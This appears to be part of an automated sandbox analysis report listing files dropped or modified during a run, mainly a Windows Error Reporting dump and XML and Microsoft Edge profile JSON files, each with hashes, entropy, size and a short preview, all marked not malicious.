                                                                                                                                                                                                                                                                  MD5:ED141200CF28A1DD50297AF5487C518B
                                                                                                                                                                                                                                                                  SHA1:A46741C7C3D39F57D766668C7CF6F1A974108057
                                                                                                                                                                                                                                                                  SHA-256:1AA554CFEA0716711B77A251DCE18EB0E03630DC65EFD0CFB6AD50FF6A77F1CD
                                                                                                                                                                                                                                                                  SHA-512:3CDBB495391DF7852F8CCC288BCFF2B133902A3D486541F42EA0083B8BAFE4929F831DF0C858C8270C78E42D4E79D71CA635F62D2ACD24D6E57E3003EAFC1A6D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MDMP..a..... .......`.dg........................................2!..........T.......8...........T.......................................................................................................................eJ..............Lw......................T.......X#..].dg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4C6.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8816
                                                                                                                                                                                                                                                                  Entropy (8bit):3.693788137484834
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ3wuG6YK1+u9gmfr57v1YpDB89blokfyXm:R6lXJg/6Yo+u9gmfrFvZlDfb
                                                                                                                                                                                                                                                                  MD5:54FDFE704FEAD5647B85E34AD773D475
                                                                                                                                                                                                                                                                  SHA1:0D022CD357B8FA13EB7729F29213F4D66C2DF427
                                                                                                                                                                                                                                                                  SHA-256:1788A209A75BA966D6F6A45EA33D58CD9B015A0D2329FFC7B80CB6CCEBBFCDE9
                                                                                                                                                                                                                                                                  SHA-512:8042BAE54D2817F0FB9F699F1333DE75EF408B52C1BB33397A14989F5559FFB8E30277602769862B7138C472FBEE571D1B83F6722DEDFEB860FFF18F77AA6A3A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.0.4.8.<./.P.i.

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA505.tmp.xml

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4853
                                                                                                                                                                                                                                                                  Entropy (8bit):4.443783142129755
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsWJg771I9oLWpW8VYXyYm8M4Jk5LvM6FBiyq8vU5LvMDhaMufFd:uIjfsI7f67V2JcjM/WsjMDh1uNd
                                                                                                                                                                                                                                                                  MD5:A006098C615BF2E921B10097999BB943
                                                                                                                                                                                                                                                                  SHA1:3FC9C96D32A377096E631FB925694E7C930C0116
                                                                                                                                                                                                                                                                  SHA-256:E2BA1B459A5C2E4586A9BD3A5C7B9FCAE86B1B415E4918635D375D1A574D7590
                                                                                                                                                                                                                                                                  SHA-512:8EDE7E629F7194BBA97D570AEDF83C639E2FFBE06CD5EFDE09CD3BB831D30C9D587148DD35E17FE8EA5C0746BF585D015965E0C40BC127FAB22474C4DDB352B2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638148" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\106794de-5d29-43c5-a906-3b1aef83b64a.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):45904
                                                                                                                                                                                                                                                                  Entropy (8bit):6.087984575325815
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:gMkbJrT8IeQc50Kuxzbi1zNtUcH6sFATQhv5ZMCiokJDSgzMMd6qD47u30p:gMk1rT8HsKGQh3MFoktSmd6qE7P
                                                                                                                                                                                                                                                                  MD5:7492CCB0394A608474D6D9B19A703A20
                                                                                                                                                                                                                                                                  SHA1:E570C45BFA5CEA8874C9AF1CBD43C220AF9B1CC7
                                                                                                                                                                                                                                                                  SHA-256:5FC08D47877F0751B9EF9E9E2EB2F5C25AF186859BDA5FA578745F4E98DBE864
                                                                                                                                                                                                                                                                  SHA-512:8FD6F01CC282B2452F30DC729088C1C0AF3A39C16D691A69895A1E8319F43DA585622ACD19C3851CEE873A944B3051D7F789F89BE2E05547E48FE82F1364841D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379085864348925","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612268"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\21041b02-7442-49bf-81f8-21a04fc614d7.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44870
                                                                                                                                                                                                                                                                  Entropy (8bit):6.095454123803136
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWe0i1zNt9NBHD+73GkKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn18KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:5CF8006DF720A43AC3BFA15E8B6452F2
                                                                                                                                                                                                                                                                  SHA1:0F8C945B9294F5B395BE8AC3BB3CE657B9F0A2AC
                                                                                                                                                                                                                                                                  SHA-256:D3A6F3B27EE8284D4FAB7B670E32CE645D4E2752174E2EBE81CD3FD6931097E3
                                                                                                                                                                                                                                                                  SHA-512:A1BCAC252AA5AC4172934E95BF0A8A7D97146E183DC32C1EF56655EDF9C9DA805112DCC07738E6B3892238C47807565A7B6BF47892C03F29A8DEA2B66D87561D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\21b72256-098a-42a5-8f6e-9aea7af315d8.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):45904
                                                                                                                                                                                                                                                                  Entropy (8bit):6.087987130995248
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:gMkbJrT8IeQc509uxzbi1zNtUcH6sFATQhv5ZMCiokJDSgzMMd6qD47u30p:gMk1rT8Hs9GQh3MFoktSmd6qE7P
                                                                                                                                                                                                                                                                  MD5:B0C40064F47D954C2C59BFD24D4DF661
                                                                                                                                                                                                                                                                  SHA1:FB0BCE273D5C74FE9EC102435B7DA5F8A1953BDF
                                                                                                                                                                                                                                                                  SHA-256:4764745CFA1205402C700ADF70195FF5406CB74BCF8B412B2D71973FB10E59EE
                                                                                                                                                                                                                                                                  SHA-512:A3B58A7322D9903030D0690A0E9D884B08197A484BA5A439284844151E665B8735A3CB41382160343FA2D6B6C21F195C9816AD5202A033590E2F7E9E26314759
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379085864348925","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612268"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\34749cca-6278-48a0-ab93-3dfa3805b53f.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):44517
                                                                                                                                                                                                                                                                  Entropy (8bit):6.097190632531874
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:gMkbJrT8IeQc5dKuqPi1zNt+CgKHDoUFPBXEEKQhv5ZWJDSgzMMd6qD47u30o:gMk1rT8H1KRCSQh3WtSmd6qE7W
                                                                                                                                                                                                                                                                  MD5:F9FA2DA7BF63FF714DFA71AA5E3BFE06
                                                                                                                                                                                                                                                                  SHA1:1809287E26B8EE54E8548B527E7F7F7543CF89B2
                                                                                                                                                                                                                                                                  SHA-256:33E211F5EFD4AC0A8C39BDC6F451A5E324EE767493D712CAF719F47FBC4F7DA8
                                                                                                                                                                                                                                                                  SHA-512:30CB768F4AA0225C181F647A5F84819D317F8F0645EF30338AA83734D635DCE2FE69E798FD2E0B900EDDDA1FB038D8D9A9C9412EFA3F66538CBAE8B0D87F12D2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379085864348925","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612268"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\41d2caf3-b0fa-4caa-b83d-31f403a2f84b.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):42897
                                                                                                                                                                                                                                                                  Entropy (8bit):6.095850502257077
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:gMkbJrT8IeQc5dKuqPi1zNt96fH6sFATQhv5ZWJDSgzMMd6qD47u30o:gMk1rT8H1Kk5Qh3WtSmd6qE7W
                                                                                                                                                                                                                                                                  MD5:E80E29D86FB0F21D98B8DFBC3F29575B
                                                                                                                                                                                                                                                                  SHA1:4E83DC16502E71580BA037A583A6029104369F88
                                                                                                                                                                                                                                                                  SHA-256:605F23274B416A434D476828149672D6093A20BBD5B22823E4E10BE1EA22221B
                                                                                                                                                                                                                                                                  SHA-512:0313AC8E99ED3036900EB5782657B52EF54288BE8C1E7DBEDA6C4311BE0EB1EB44FE53E3CEE17B2B3B48D236327F1A7FDF7A00BBFD13B7F05FABAAF51491511C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379085864348925","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612268"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\879ba99d-774d-4317-9e73-1183971d88ab.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44517
                                                                                                                                                                                                                                                                  Entropy (8bit):6.097190632531874
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:gMkbJrT8IeQc5dKuqPi1zNt+CgKHDoUFPBXEEKQhv5ZWJDSgzMMd6qD47u30o:gMk1rT8H1KRCSQh3WtSmd6qE7W
                                                                                                                                                                                                                                                                  MD5:F9FA2DA7BF63FF714DFA71AA5E3BFE06
                                                                                                                                                                                                                                                                  SHA1:1809287E26B8EE54E8548B527E7F7F7543CF89B2
                                                                                                                                                                                                                                                                  SHA-256:33E211F5EFD4AC0A8C39BDC6F451A5E324EE767493D712CAF719F47FBC4F7DA8
                                                                                                                                                                                                                                                                  SHA-512:30CB768F4AA0225C181F647A5F84819D317F8F0645EF30338AA83734D635DCE2FE69E798FD2E0B900EDDDA1FB038D8D9A9C9412EFA3F66538CBAE8B0D87F12D2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379085864348925","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612268"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\96fc0bc0-2738-478d-b449-042f76ae9cb7.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44926
                                                                                                                                                                                                                                                                  Entropy (8bit):6.095845472703918
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWv0i1zNt99cH6sFATKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yOcnKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:F123E58C147B1D500FFFF663108D306D
                                                                                                                                                                                                                                                                  SHA1:3CFEA044E6D01E1492607AE230F5A3982F129D8C
                                                                                                                                                                                                                                                                  SHA-256:4863EB029E45E244E87EDF873EC0E59634BF05C747A878CF167F30635B0043CB
                                                                                                                                                                                                                                                                  SHA-512:18B03E2096213F028B166015A2A6C95E60AA0C24BFB25670C6B7C157DC911407C3D16F1D5FB6CFCC3946B1BBE4CA1CD555848B2E009EF1391734C0B1E828D0BA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9820d6ee-3fdf-4b37-99a4-85637aee5b4f.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):45827
                                                                                                                                                                                                                                                                  Entropy (8bit):6.088068300120391
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:gMkbJrT8IeQc5dKuxzbi1zNt99cH6sFATQhv5ZMCiokJDSgzMMd6qD47u30p:gMk1rT8H1KBnQh3MFoktSmd6qE7P
                                                                                                                                                                                                                                                                  MD5:83E25A5A1DB2DB78DF98611BCCB6DEB8
                                                                                                                                                                                                                                                                  SHA1:8DB2BC3ED9753CCEE9EE4C82DD36D6FBB2BA39E8
                                                                                                                                                                                                                                                                  SHA-256:F537595DB7F37FBB51EE39D7A110EA70893284E73453AC40E41A09A2C3F3F55C
                                                                                                                                                                                                                                                                  SHA-512:47DD6FE9CB213D0F6DA2A00241E77691F67F8E85BFA690A4AA12D386A69CDFEB7133B0466FBE81E03AD0038357ACD257E3A6DC0FD3C292141B76611B17CA10BF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379085864348925","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612268"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\05a2c3ae-e930-4b19-a853-1fee9a4ca4f4.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
